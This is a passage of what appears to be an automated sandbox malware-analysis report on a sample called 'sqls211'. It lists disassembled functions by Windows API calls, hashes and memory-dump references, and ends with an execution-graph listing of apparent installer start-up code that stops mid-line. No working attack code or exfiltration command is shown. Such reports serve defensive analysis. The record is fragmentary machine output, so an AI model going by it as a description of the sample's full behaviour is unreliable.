                                                                                                            • Instruction ID: b9b616f0f9ff8281a280dc32e29f32a83e0f5995de22f371b5ead4d43faef219
                                                                                                            • Opcode Fuzzy Hash: bd442eda82545ee759a2abd9c7944d0f68351fbe24a826656730094eb21747e6
                                                                                                            • Instruction Fuzzy Hash: 3E41B6719006699BCB259F69CD09AEE7BB8EF01311F04401EFD45F7341DB34AE458AB0
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CE91E0,?,00000000,?,00000001,?,?,00000001,00CE91E0,?), ref: 00CEC9D5
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CECA5E
                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CE6CBE,?), ref: 00CECA70
                                                                                                            • __freea.LIBCMT ref: 00CECA79
                                                                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                            • String ID:
                                                                                                            • API String ID: 2652629310-0
                                                                                                            • Opcode ID: 4fa2eb9b83b39cf1d518c298ca3f4ddc0be4a2d96b5d42b8e0fbddd28e130c47
                                                                                                            • Instruction ID: fccd8347f622f2fbd09f0bb9759f4caa01c782054caef3d33c722815a1c33296
                                                                                                            • Opcode Fuzzy Hash: 4fa2eb9b83b39cf1d518c298ca3f4ddc0be4a2d96b5d42b8e0fbddd28e130c47
                                                                                                            • Instruction Fuzzy Hash: 4B31D032A0024AABDF24DF66CC85EBE7BA5EB41310B044129FC15E7250EB35CE51EB90
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 00CDA666
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CDA675
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CDA683
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00CDA691
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 1035833867-0
                                                                                                            • Opcode ID: 7b9ebd1f9fc24d79756ec4d58befa97d631f13e0066e121275a238fddcea5aec
                                                                                                            • Instruction ID: 6682e51dd08cd82603d1eccb935c51377c3096ae7ba4cf8c88732c30896630c2
                                                                                                            • Opcode Fuzzy Hash: 7b9ebd1f9fc24d79756ec4d58befa97d631f13e0066e121275a238fddcea5aec
                                                                                                            • Instruction Fuzzy Hash: AAE0EC31942B21A7D2715F60AD0DB8A3E54AB25B52F010101FB09D6390DB6886028BB5
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CDA699: GetDC.USER32(00000000), ref: 00CDA69D
                                                                                                              • Part of subcall function 00CDA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CDA6A8
                                                                                                              • Part of subcall function 00CDA699: ReleaseDC.USER32(00000000,00000000), ref: 00CDA6B3
                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00CDA83C
                                                                                                              • Part of subcall function 00CDAAC9: GetDC.USER32(00000000), ref: 00CDAAD2
                                                                                                              • Part of subcall function 00CDAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CDAB01
                                                                                                              • Part of subcall function 00CDAAC9: ReleaseDC.USER32(00000000,?), ref: 00CDAB99
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                                            • String ID: (
                                                                                                            • API String ID: 1061551593-3887548279
                                                                                                            • Opcode ID: 1849bab8fa63c7581bf0a0eceadd55c04fc8caab172e6b69b323412777e70804
                                                                                                            • Instruction ID: d2a442841180164461a85e03a1d30f6f47b70ab2b3609298fa9aa6aedbca9de7
                                                                                                            • Opcode Fuzzy Hash: 1849bab8fa63c7581bf0a0eceadd55c04fc8caab172e6b69b323412777e70804
                                                                                                            • Instruction Fuzzy Hash: C091D275604354AFD610DF25C848A2BBBE8FFC9710F00491EFA9AD3261DB30A946DF62
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00CEB324
                                                                                                              • Part of subcall function 00CE9097: IsProcessorFeaturePresent.KERNEL32(00000017,00CE9086,00000050,00CF3A34,?,00CCD710,00000004,00D01030,?,?,00CE9093,00000000,00000000,00000000,00000000,00000000), ref: 00CE9099
                                                                                                              • Part of subcall function 00CE9097: GetCurrentProcess.KERNEL32(C0000417,00CF3A34,00000050,00D01030), ref: 00CE90BB
                                                                                                              • Part of subcall function 00CE9097: TerminateProcess.KERNEL32(00000000), ref: 00CE90C2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                            • String ID: *?$.
                                                                                                            • API String ID: 2667617558-3972193922
                                                                                                            • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                            • Instruction ID: cc257a6439974cd86290317cb8f2dd9085f0f90b5fc542a2f2bce62bd0be310c
                                                                                                            • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                            • Instruction Fuzzy Hash: C551B371E0024AEFDF14DFAAC881ABEB7B5EF58310F244169E954E7350EB319E019B50
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC75E3
                                                                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                                                                              • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC777F
                                                                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                            • String ID: :
                                                                                                            • API String ID: 3226429890-336475711
                                                                                                            • Opcode ID: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                                                                            • Instruction ID: c638ec9dc1e7bee442f45cd3c7af10860d71cc1e18af2e116dc808a77c566db6
                                                                                                            • Opcode Fuzzy Hash: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                                                                            • Instruction Fuzzy Hash: 95416F71800158AAEB25EB64CD5AFEEB378EF45300F00819AF609A7192DB745F85DF71
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: }
                                                                                                            • API String ID: 176396367-4239843852
                                                                                                            • Opcode ID: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                                                                            • Instruction ID: df0fc782a0b8b11589a5078f27756ba98f7192f771efef5ce8a5a7891151139a
                                                                                                            • Opcode Fuzzy Hash: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                                                                            • Instruction Fuzzy Hash: BE21D17290434A9AD731EA64E845F6BB3ECDF91750F02042BF744C3341FB64AE4893A2
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                                                                              • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00CCF33E), ref: 00CCF3D2
                                                                                                            Strings
                                                                                                            • CryptUnprotectMemory failed, xrefs: 00CCF3CA
                                                                                                            • CryptProtectMemory failed, xrefs: 00CCF389
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CurrentProcess
                                                                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                            • API String ID: 2190909847-396321323
                                                                                                            • Opcode ID: b60648bbac8c28dbbc953fac4b7ce7a1d2ecf76092cbcf1dc266e1e3d67b9f0c
                                                                                                            • Instruction ID: 4b7cefbfa6cd8862c78db8bc376378448b77ab4cb029b99b7040708834df9d70
                                                                                                            • Opcode Fuzzy Hash: b60648bbac8c28dbbc953fac4b7ce7a1d2ecf76092cbcf1dc266e1e3d67b9f0c
                                                                                                            • Instruction Fuzzy Hash: A3110331A007A9BBEF119B21DC45F6E3B56FF04720B08416EFC559B2A1DA709E0296A2
                                                                                                            APIs
                                                                                                            • _swprintf.LIBCMT ref: 00CCB9B8
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vswprintf_c_l_swprintf
                                                                                                            • String ID: %c:\
                                                                                                            • API String ID: 1543624204-3142399695
                                                                                                            • Opcode ID: 5e18e7c3a3a1786d52f822c99266d5c0d9b2095f8381ceaf8c8f7cf4216217c7
                                                                                                            • Instruction ID: 2d5fc86bec372f8e1035436abe26daaed0fdf2f36071d77ff3a511c646feda25
                                                                                                            • Opcode Fuzzy Hash: 5e18e7c3a3a1786d52f822c99266d5c0d9b2095f8381ceaf8c8f7cf4216217c7
                                                                                                            • Instruction Fuzzy Hash: B501D263500351A99A346BA6CC87E6BA7ACEE91770F40841EF599D7082EB30DD4092B1
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00010000,00CD1160,?,00000000,00000000), ref: 00CD1043
                                                                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00CD108A
                                                                                                              • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                            • String ID: CreateThread failed
                                                                                                            • API String ID: 2655393344-3849766595
                                                                                                            • Opcode ID: e5934255b618eb76e084f9bd78e22cf478d54a3f3a34baa2e3a4a1a91eec08e0
                                                                                                            • Instruction ID: 97df4a88994c7d4a28464b8da6e808a5c9613c0f53dbb3127b493d5bd7711cf1
                                                                                                            • Opcode Fuzzy Hash: e5934255b618eb76e084f9bd78e22cf478d54a3f3a34baa2e3a4a1a91eec08e0
                                                                                                            • Instruction Fuzzy Hash: 4101A2B93443497BD3346E64ED51F7A7398EB41751F24002FFA8692380CAE168858625
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CCE2E8: _swprintf.LIBCMT ref: 00CCE30E
                                                                                                              • Part of subcall function 00CCE2E8: _strlen.LIBCMT ref: 00CCE32F
                                                                                                              • Part of subcall function 00CCE2E8: SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                                                                              • Part of subcall function 00CCE2E8: GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                                                                              • Part of subcall function 00CCE2E8: GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                                                                            • SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 2622349952-4108050209
                                                                                                            • Opcode ID: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                                                                            • Instruction ID: 968b01009f00042b7a95640bf549a54c323b3d9b6307ea98a4ba58ea4b1fa4d0
                                                                                                            • Opcode Fuzzy Hash: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                                                                            • Instruction Fuzzy Hash: C9F036301043C8A6EF155F51CC0DFA93B599B5634DF0C4119FD58955A2C778CA91AA70
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00CD1206,?), ref: 00CD0FEA
                                                                                                            • GetLastError.KERNEL32(?), ref: 00CD0FF6
                                                                                                              • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                                                                            Strings
                                                                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CD0FFF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                            • API String ID: 1091760877-2248577382
                                                                                                            • Opcode ID: e8646f30f7d125d4b20c201628b8d2fea6057a8f5c77feb47ea3286087b99d82
                                                                                                            • Instruction ID: a54e194efadc6537bb13b07daf504ea169e1568b874fa844cf7a1086cc1482b8
                                                                                                            • Opcode Fuzzy Hash: e8646f30f7d125d4b20c201628b8d2fea6057a8f5c77feb47ea3286087b99d82
                                                                                                            • Instruction Fuzzy Hash: 16D05B7150456477C6103324AD05FBF39049B12731B54472AF579552F5CE154AC19697
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00CCDA55,?), ref: 00CCE2A3
                                                                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CCDA55,?), ref: 00CCE2B1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindHandleModuleResource
                                                                                                            • String ID: RTL
                                                                                                            • API String ID: 3537982541-834975271
                                                                                                            • Opcode ID: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                                                                            • Instruction ID: 66bd738cbe5644ada963358f16c51e3f6c7f2713c914d702ae9c4e772cd5cf5c
                                                                                                            • Opcode Fuzzy Hash: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                                                                            • Instruction Fuzzy Hash: 34C0803124079076E73037757C0DF576E585B01B11F05045DF641E91D1DEE5C540C7E1

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:27.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:13.1%
                                                                                                            Total number of Nodes:1394
                                                                                                            Total number of Limit Nodes:42
                                                                                                            execution_graph 3233 403640 SetErrorMode GetVersionExW 3234 403692 GetVersionExW 3233->3234 3235 4036ca 3233->3235 3234->3235 3236 403723 3235->3236 3237 406a35 5 API calls 3235->3237 3323 4069c5 GetSystemDirectoryW 3236->3323 3237->3236 3239 403739 lstrlenA 3239->3236 3240 403749 3239->3240 3326 406a35 GetModuleHandleA 3240->3326 3243 406a35 5 API calls 3244 403757 3243->3244 3245 406a35 5 API calls 3244->3245 3246 403763 #17 OleInitialize SHGetFileInfoW 3245->3246 3332 406668 lstrcpynW 3246->3332 3249 4037b0 GetCommandLineW 3333 406668 lstrcpynW 3249->3333 3251 4037c2 3334 405f64 3251->3334 3254 4038f7 3255 40390b GetTempPathW 3254->3255 3338 40360f 3255->3338 3257 403923 3259 403927 GetWindowsDirectoryW lstrcatW 3257->3259 3260 40397d DeleteFileW 3257->3260 3258 405f64 CharNextW 3262 4037f9 3258->3262 3263 40360f 12 API calls 3259->3263 3348 4030d0 GetTickCount GetModuleFileNameW 3260->3348 3262->3254 3262->3258 3267 4038f9 3262->3267 3265 403943 3263->3265 3264 403990 3268 403b6c ExitProcess CoUninitialize 3264->3268 3270 403a45 3264->3270 3277 405f64 CharNextW 3264->3277 3265->3260 3266 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3265->3266 3269 40360f 12 API calls 3266->3269 3434 406668 lstrcpynW 3267->3434 3272 403b91 3268->3272 3273 403b7c 3268->3273 3276 403975 3269->3276 3378 403d17 3270->3378 3274 403b99 GetCurrentProcess OpenProcessToken 3272->3274 3275 403c0f ExitProcess 3272->3275 3489 405cc8 3273->3489 3280 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3274->3280 3281 403bdf 3274->3281 3276->3260 3276->3268 3292 4039b2 3277->3292 3280->3281 3285 406a35 5 API calls 3281->3285 3282 403a54 3282->3268 3288 403be6 3285->3288 3286 403a1b 3435 40603f 3286->3435 3287 403a5c 3451 405c33 3287->3451 3290 403bfb ExitWindowsEx 3288->3290 3294 403c08 3288->3294 3290->3275 3290->3294 3292->3286 3292->3287 3493 40140b 3294->3493 3297 403a72 lstrcatW 3298 403a7d lstrcatW lstrcmpiW 3297->3298 3298->3282 3299 403a9d 3298->3299 3301 403aa2 3299->3301 3302 403aa9 3299->3302 3454 405b99 CreateDirectoryW 3301->3454 3459 405c16 CreateDirectoryW 3302->3459 3303 403a3a 3450 406668 lstrcpynW 3303->3450 3308 403aae SetCurrentDirectoryW 3309 403ac0 3308->3309 3310 403acb 3308->3310 3462 406668 lstrcpynW 3309->3462 3463 406668 lstrcpynW 3310->3463 3315 403b19 CopyFileW 3319 403ad8 3315->3319 3316 403b63 3318 406428 36 API calls 3316->3318 3318->3282 3319->3316 3320 4066a5 17 API calls 3319->3320 3322 403b4d CloseHandle 3319->3322 3464 4066a5 3319->3464 3481 406428 MoveFileExW 3319->3481 3486 405c4b CreateProcessW 3319->3486 3320->3319 3322->3319 3324 4069e7 wsprintfW LoadLibraryExW 3323->3324 3324->3239 3327 406a51 3326->3327 3328 406a5b GetProcAddress 3326->3328 3329 4069c5 3 API 